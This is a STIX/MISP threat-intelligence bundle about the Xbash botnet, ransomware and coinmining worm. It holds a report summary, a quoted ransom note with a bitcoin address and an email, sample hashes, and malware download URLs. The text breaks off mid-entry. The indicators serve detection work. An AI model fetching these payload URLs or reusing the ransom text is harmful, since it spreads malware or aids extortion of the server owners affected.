2626 lines
No EOL
118 KiB
JSON
2626 lines
No EOL
118 KiB
JSON
{
|
|
"type": "bundle",
|
|
"id": "bundle--5ba1d01f-27cc-438f-9cbc-4652950d210f",
|
|
"objects": [
|
|
{
|
|
"type": "identity",
|
|
"spec_version": "2.1",
|
|
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:36.000Z",
|
|
"modified": "2018-09-19T05:21:36.000Z",
|
|
"name": "CIRCL",
|
|
"identity_class": "organization"
|
|
},
|
|
{
|
|
"type": "report",
|
|
"spec_version": "2.1",
|
|
"id": "report--5ba1d01f-27cc-438f-9cbc-4652950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:21:36.000Z",
|
|
"modified": "2018-09-19T05:21:36.000Z",
|
|
"name": "OSINT (expanded) - Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows",
|
|
"published": "2018-09-19T05:21:55Z",
|
|
"object_refs": [
|
|
"observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"url--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f",
|
|
"x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f",
|
|
"indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f",
|
|
"indicator--5ba1d258-c978-467b-acc6-28a2950d210f",
|
|
"indicator--5ba1d258-9f30-40cc-b608-28a2950d210f",
|
|
"indicator--5ba1d259-3908-490a-947e-28a2950d210f",
|
|
"indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f",
|
|
"indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f",
|
|
"indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f",
|
|
"indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f",
|
|
"indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f",
|
|
"indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f",
|
|
"indicator--5ba1d299-3438-4286-a1ad-4737950d210f",
|
|
"indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f",
|
|
"indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f",
|
|
"indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f",
|
|
"indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f",
|
|
"indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f",
|
|
"indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f",
|
|
"indicator--5ba1d4ce-484c-4c15-8ce5-4d5f950d210f",
|
|
"indicator--5ba1d4ce-5a48-4f70-91c6-4ce9950d210f",
|
|
"indicator--5ba1d4ce-db6c-4068-8334-4a3b950d210f",
|
|
"indicator--5ba1d4cf-b984-4242-bafc-49d0950d210f",
|
|
"indicator--5ba1d4cf-0f64-408b-8b8d-42a0950d210f",
|
|
"indicator--5ba1d4d0-bddc-4521-814d-473c950d210f",
|
|
"indicator--5ba1d4d0-1d8c-424a-b2d8-4430950d210f",
|
|
"indicator--5ba1d4d1-1698-491d-a555-4331950d210f",
|
|
"indicator--5ba1d4d1-2518-4b2f-be8f-46e4950d210f",
|
|
"indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f",
|
|
"indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f",
|
|
"indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f",
|
|
"indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f",
|
|
"indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f",
|
|
"indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f",
|
|
"indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f",
|
|
"indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f",
|
|
"indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f",
|
|
"indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f",
|
|
"indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f",
|
|
"indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f",
|
|
"indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f",
|
|
"indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f",
|
|
"indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f",
|
|
"indicator--5ba1d508-02d8-44e3-a778-27c3950d210f",
|
|
"indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f",
|
|
"indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f",
|
|
"indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f",
|
|
"x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f",
|
|
"x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f",
|
|
"indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f",
|
|
"indicator--5ba1d560-0e08-460b-9909-480b950d210f",
|
|
"indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f",
|
|
"x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f",
|
|
"x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f",
|
|
"x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f",
|
|
"x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f",
|
|
"indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e",
|
|
"x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e",
|
|
"indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c",
|
|
"x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e",
|
|
"indicator--edd4b990-82be-4e5e-858f-50bbd7222f03",
|
|
"x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5",
|
|
"indicator--33e723b8-2142-46a4-8eae-c311211ea8a0",
|
|
"x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91",
|
|
"indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9",
|
|
"x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564",
|
|
"indicator--93747f03-1eec-47e4-82bc-29b8356a4961",
|
|
"x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c",
|
|
"indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07",
|
|
"x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7",
|
|
"indicator--45a9a837-c3c8-436c-a546-30547955ba2c",
|
|
"x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862",
|
|
"indicator--d3df327a-fc5e-422f-a7a1-56849a91787a",
|
|
"x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d",
|
|
"indicator--14197298-00cc-4d59-85a6-5cf1be917b5c",
|
|
"x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e",
|
|
"indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba",
|
|
"x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3",
|
|
"indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096",
|
|
"x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a",
|
|
"indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa",
|
|
"x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63",
|
|
"indicator--f092ea7b-05e2-4d29-8196-a214407feb5e",
|
|
"x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a",
|
|
"indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0",
|
|
"x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a",
|
|
"relationship--62c44254-dfdd-46a5-8405-b822bd1e8729",
|
|
"relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d",
|
|
"relationship--3a5866c4-e62f-456c-822c-e656cef75d59",
|
|
"relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e",
|
|
"relationship--97dce8d6-48a2-4712-bd1a-378edec44abe",
|
|
"relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f",
|
|
"relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc",
|
|
"relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196",
|
|
"relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51",
|
|
"relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926",
|
|
"relationship--d20dc510-00b2-4562-862d-af956e2cd62b",
|
|
"relationship--2dd0a986-b772-4b30-b878-9e1e211e7482",
|
|
"relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574",
|
|
"relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a",
|
|
"relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6"
|
|
],
|
|
"labels": [
|
|
"Threat-Report",
|
|
"misp:tool=\"MISP-STIX-Converter\"",
|
|
"ms-caro-malware:malware-platform=\"Python\"",
|
|
"osint:source-type=\"blog-post\"",
|
|
"misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Exploit Public-Facing Application - T1190\"",
|
|
"misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Standard Application Layer Protocol - T1071\"",
|
|
"misp-galaxy:tool=\"Xbash\"",
|
|
"misp-galaxy:threat-actor=\"Iron Group\""
|
|
],
|
|
"object_marking_refs": [
|
|
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:10:42.000Z",
|
|
"modified": "2018-09-19T05:10:42.000Z",
|
|
"first_observed": "2018-09-19T05:10:42Z",
|
|
"last_observed": "2018-09-19T05:10:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--5ba1d038-785c-41d2-8712-4c5d950d210f"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\"",
|
|
"osint:source-type=\"blog-post\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--5ba1d038-785c-41d2-8712-4c5d950d210f",
|
|
"value": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d04d-25a0-455c-9ee7-45f3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T05:10:43.000Z",
|
|
"modified": "2018-09-19T05:10:43.000Z",
|
|
"labels": [
|
|
"misp:type=\"text\"",
|
|
"misp:category=\"External analysis\"",
|
|
"osint:source-type=\"blog-post\""
|
|
],
|
|
"x_misp_category": "External analysis",
|
|
"x_misp_type": "text",
|
|
"x_misp_value": "Unit 42 researchers have found a new malware family that is targeting Linux and Microsoft Windows servers. We can tie this malware, which we have named Xbash, to the Iron Group, a threat actor group known for previous ransomware attacks.\r\n\r\nXbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya). It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations\u00e2\u20ac\u2122 network (again, much like WannaCry or Petya/NotPetya).\r\n\r\nXbash spreads by attacking weak passwords and unpatched vulnerabilities.\r\n\r\nXbash is data-destructive; destroying Linux-based databases as part of its ransomware capabilities. We can also find no functionality within Xbash that would enable restoration after the ransom is paid. This means that, similar to NotPetya, Xbash is data destructive malware posing as ransomware.\r\n\r\nOrganizations can protect themselves against Xbash by:\r\n\r\n Using strong, non-default passwords\r\n Keeping up-to-date on security updates\r\n Implementing endpoint security on Microsoft Windows and Linux systems\r\n Preventing access to unknown hosts on the internet (to prevent access to command and control servers)\r\n Implementing and maintaining rigorous and effective backup and restoration processes and procedures.\r\n\r\nPalo Alto Networks customers are protected against Xbash as outlined at the end of this post.\r\n\r\nBelow are some more specifics on Xbash\u00e2\u20ac\u2122s capabilities:\r\n\r\n It combines botnet, coinmining, ransomware and self-propagation\r\n It targets Linux-based systems for its ransomware and botnet capabilities\r\n It targets Microsoft Windows-based systems for its coinmining and self-propagating capabilities\r\n The ransomware component targets and deletes Linux-based databases\r\n To date, we have observed 48 incoming transactions to these wallets with total income of about 0.964 bitcoins meaning 48 victims have paid about US $6,000 total (at the time of this writing)\r\n However, as see no evidence that the paid ransoms have resulted in recovery for the victims\r\n In fact, we can find no evidence of any functionality that makes recovery possible through ransom payment.\r\n Our analysis shows this is likely the work of the Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015."
|
|
},
|
|
{
|
|
"type": "x-misp-attribute",
|
|
"spec_version": "2.1",
|
|
"id": "x-misp-attribute--5ba1d0a7-b470-45ff-ba90-27fb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:29:27.000Z",
|
|
"modified": "2018-09-19T04:29:27.000Z",
|
|
"labels": [
|
|
"misp:type=\"btc\"",
|
|
"misp:category=\"Financial fraud\"",
|
|
"misp:to_ids=\"True\""
|
|
],
|
|
"x_misp_category": "Financial fraud",
|
|
"x_misp_comment": "If Xbash successfully logs in to a service including MySQL, MongoDB, and PostgreSQL, it will delete almost all existing databases in the server (except for some databases that stored user login information), create a new database named \u00e2\u20ac\u0153PLEASE_READ_ME_XYZ\u00e2\u20ac\u009d, and insert a ransom message into table \u00e2\u20ac\u0153WARNING\u00e2\u20ac\u009d of the new database, as shown in Figure 4 and Figure 5. Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not received your payment,we will leak your database 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 backupsql@pm.me",
|
|
"x_misp_type": "btc",
|
|
"x_misp_value": "1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d257-f6fc-4740-b3f8-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:39.000Z",
|
|
"modified": "2018-09-19T04:36:39.000Z",
|
|
"description": "zlibx",
|
|
"pattern": "[file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d258-c978-467b-acc6-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:40.000Z",
|
|
"modified": "2018-09-19T04:36:40.000Z",
|
|
"description": "Xbash",
|
|
"pattern": "[file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d258-9f30-40cc-b608-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:40.000Z",
|
|
"modified": "2018-09-19T04:36:40.000Z",
|
|
"description": "xapache",
|
|
"pattern": "[file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d259-3908-490a-947e-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:41.000Z",
|
|
"modified": "2018-09-19T04:36:41.000Z",
|
|
"description": "libhttpd",
|
|
"pattern": "[file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d259-08f8-485f-ac9b-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:41.000Z",
|
|
"modified": "2018-09-19T04:36:41.000Z",
|
|
"description": "XbashX",
|
|
"pattern": "[file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d259-24bc-4aed-a9c2-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:41.000Z",
|
|
"modified": "2018-09-19T04:36:41.000Z",
|
|
"description": "XbashY",
|
|
"pattern": "[file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25a-0a94-45e3-a624-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:42.000Z",
|
|
"modified": "2018-09-19T04:36:42.000Z",
|
|
"description": "rootv2.sh",
|
|
"pattern": "[file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25a-3294-4259-ba5a-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:42.000Z",
|
|
"modified": "2018-09-19T04:36:42.000Z",
|
|
"description": "owerv2.sh",
|
|
"pattern": "[file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25b-0cd8-42b3-891c-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:43.000Z",
|
|
"modified": "2018-09-19T04:36:43.000Z",
|
|
"description": "rootv2.sh",
|
|
"pattern": "[file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d25b-6a28-48a6-9413-28a2950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:36:43.000Z",
|
|
"modified": "2018-09-19T04:36:43.000Z",
|
|
"description": "r88.sh",
|
|
"pattern": "[file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:36:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d299-3438-4286-a1ad-4737950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:45.000Z",
|
|
"modified": "2018-09-19T04:37:45.000Z",
|
|
"description": "tt.txt",
|
|
"pattern": "[file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:45Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29a-7290-41ea-bdb1-4f76950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:46.000Z",
|
|
"modified": "2018-09-19T04:37:46.000Z",
|
|
"description": "tg.jpg",
|
|
"pattern": "[file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29a-b8e8-46d8-b9c5-4381950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:46.000Z",
|
|
"modified": "2018-09-19T04:37:46.000Z",
|
|
"description": "reg9.sct",
|
|
"pattern": "[file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29b-e3c8-48d7-b1a1-4ac9950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:47.000Z",
|
|
"modified": "2018-09-19T04:37:47.000Z",
|
|
"description": "m.png",
|
|
"pattern": "[file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d29b-1d08-4090-82a2-47f7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:37:47.000Z",
|
|
"modified": "2018-09-19T04:37:47.000Z",
|
|
"description": "tmp.jpg",
|
|
"pattern": "[file:hashes.SHA256 = 'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:37:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cd-2424-40e7-a047-48a4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:09.000Z",
|
|
"modified": "2018-09-19T04:47:09.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/zlibx']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2018-09-19T04:47:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Network activity"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"url\"",
|
|
"misp:category=\"Network activity\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--5ba1d4cd-aaa0-4f57-93b1-4771950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2018-09-19T04:47:09.000Z",
|
|
"modified": "2018-09-19T04:47:09.000Z",
|
|
"description": "Downloading URLs",
|
|
"pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashY']",
|
|
"pattern_type": "stix",
